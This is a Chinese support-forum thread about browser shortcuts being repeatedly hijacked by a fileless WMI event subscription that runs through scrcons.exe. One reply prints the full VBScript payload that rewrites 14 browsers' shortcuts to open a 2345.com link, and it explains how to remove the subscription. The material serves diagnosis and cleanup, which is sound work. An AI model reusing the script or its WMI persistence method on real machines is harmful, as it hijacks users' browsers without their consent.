保护快捷方式不被篡改无效？无法防御浏览器被劫持？

dfgdsfg

如图，不知怎么搞的桌面浏览器的快捷方式目标后被加了一个尾巴 “http://so.wnoyng.cn/?r=x”，每次去掉，但隔会又有。


IE设置那也是被锁定状态？


保护IE快捷方式、保护桌面快捷方式、保护任务栏快捷方式都已经勾选了。结果还是无效？桌面的浏览器快捷方式目标那还是会被加上尾巴？

请问何解？ 火绒对之能彻底查处吗？

仁二

搞不懂为什么要用2345游览器……你的情况给scrcons.exe上个监控什么启动他的 或者火绒剑监控看看

dfsafds

按以下步骤打开控制面板—本地安全策略—软件限制策略——其他规则，点鼠标右键，新建散列规则（XP中好象是这个名称）、或新建哈希规则（win7），禁止WINDOWS\SYSTEM32\WBEM\scrcons.exe的运行，不知道行不行，正在试验中，本人觉得应该可以的，而且一劳永逸的解决WMI脚本木马问题。这个WMI脚本功能就是一个垃圾。近来下载了几个小游戏，一安装，结果就中招了，发现浏览器主页屡被改。百度杀毒一点提示也没有。

wyiznxfn

dfgdsfg 发表于 2016-3-16 17:15
火绒隔段时间就会提示拦截scrcons.exe对桌面浏览器快捷方式的修改，但是不能彻底清除！
...

已经很不错了，金山没起一点作用，我本来不想重装（以前是正版的家庭版WIN7）

dfgdsfg

wyiznxfn 发表于 2016-3-16 10:43
我之前也是这样，是一个2345.com/xxxxx，隔段时间就把所有浏览器快捷方式都改了（包括360浏览器，搜狗浏览 ...

火绒隔段时间就会提示拦截scrcons.exe对桌面浏览器快捷方式的修改，但是不能彻底清除！

wyiznxfn

我之前也是这样，是一个2345.com/xxxxx，隔段时间就把所有浏览器快捷方式都改了（包括360浏览器，搜狗浏览器，115浏览器，IE浏览器），网上搜答案，WMI中的计时器中没有那个项目，不管什么都删了也不行。之前用金山的，根本拦截不了快捷方式更改，逼不得已重装系统，然后换了火绒

dfgdsfg

FLY_MC 发表于 2016-3-10 19:36
搜到解决方法
查找资料，发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件，到以下地址下载W ...

这篇文章看过的，问题是根本就没有 _EventFilter:Name="unown_filter" 的选项...

FLY_MC

搜到解决方法
查找资料，发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件，到以下地址下载WMITool并安装
http://www.microsoft.com/en-us/download/details.aspx?id=24045
安装后打开WMI event viewer，点击左上角register for events，弹出Connect to namespace框，填入“root\subscription”，确定，出现下图：

点击左侧_EventFilter:Name="unown_filter"，再至右侧右键点击ActiveScriptEventConsume r Name="unown"，选择view instant properties，如下图：

查看ScriptText项可知，这是一段VBScript调用系统服务间隔30分钟执行一次，将所有浏览器调用加上“http://www.2345.com/?kunown”！抓住你了~！隐藏的够深，没常驻进程，没有文件（把自己存储在WMI数据库中）。
受到影响的浏览器有（各色浏览器，差不多齐了）：
"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"
具体代码如下：
On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:\Users\Gemini\Desktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If
最后，清除方法：在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除！
删不掉？
到WMITool安装路径（例如：C:\Program Files (x86)\WMI Tools）下，右键点击wbemeventviewer.exe，选择以管理员身份运行！删之！
还没完，还要手动将快速启动栏中，将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉！
暂时就这么多了，还有没有其它影响的话，用用再看吧！
解决方法来自：Gemini

FLY_MC

看下scrcons.exe的路径

FLY_MC

dfgdsfg 发表于 2016-2-28 22:08
禁用更改主页设置 是 未配置 的，但主页那依然锁定状态。

改成已禁用

dfgdsfg

zgy3073 发表于 2016-3-4 23:15
隔段时间提示,说明scrcon.exe的流氓行为存在，他不甘心，所以会不停地去修改。但是并不代表他成功了。

...

针对scrcon.exe下手？
scrcons.exe是系统自带的，怎么修改？ 这种病毒主要是利用WMI中的计时器使用VBS脚本文件来自启动，不写注册表，不增加服务，非常隐蔽！这里的scrcons.exe仍是正常的系统文件，只是被病毒当作跳板给利用了。

如果火绒可以跟踪scrcons.exe对应调用的脚本进行清除就完美了！

zgy3073

dfgdsfg 发表于 2016-3-3 21:34
带尾巴的快捷方式已经手动删除了，现在是浏览器重新在桌面建立了一个快捷方式。火绒会提示拦截scrcons.exe ...

隔段时间提示,说明scrcon.exe的流氓行为存在，他不甘心，所以会不停地去修改。但是并不代表他成功了。

如果想没有提示，要针对scrcon.exe下手才行，只更换快捷方式是没有用的。

dfgdsfg

带尾巴的快捷方式已经手动删除了，现在是浏览器重新在桌面建立了一个快捷方式。火绒会提示拦截scrcons.exe对桌面浏览器快捷方式的修改，但全盘扫描过未见有何清除。

事实上应该也未能清除，否则也不会隔段时间就提示拦截scrcons.exe对桌面浏览器快捷方式的修改

vardyh

dfgdsfg 发表于 2016-3-2 16:22
3.0.15.4版开始火绒可以实现保护桌面快捷方式不被加尾巴，之前的则不行。
但是只能拦截不能查杀清除吗？ ...

如果是拦截了修改，那就没有修改成功了。
但之前的被修改的快捷方式，火绒应该是可以查杀的，如果不能查杀，麻烦把这个快捷方式在回复中上传下吧，工程师会分析下。
谢谢！

dfgdsfg

3.0.15.4版开始火绒可以实现保护桌面快捷方式不被加尾巴，之前的则不行。
但是只能拦截不能查杀清除吗？

zxh

dfgdsfg 发表于 2016-2-28 22:08
禁用更改主页设置 是 未配置 的，但主页那依然锁定状态。

方便的话加一下qq，远程让工程师帮您解决下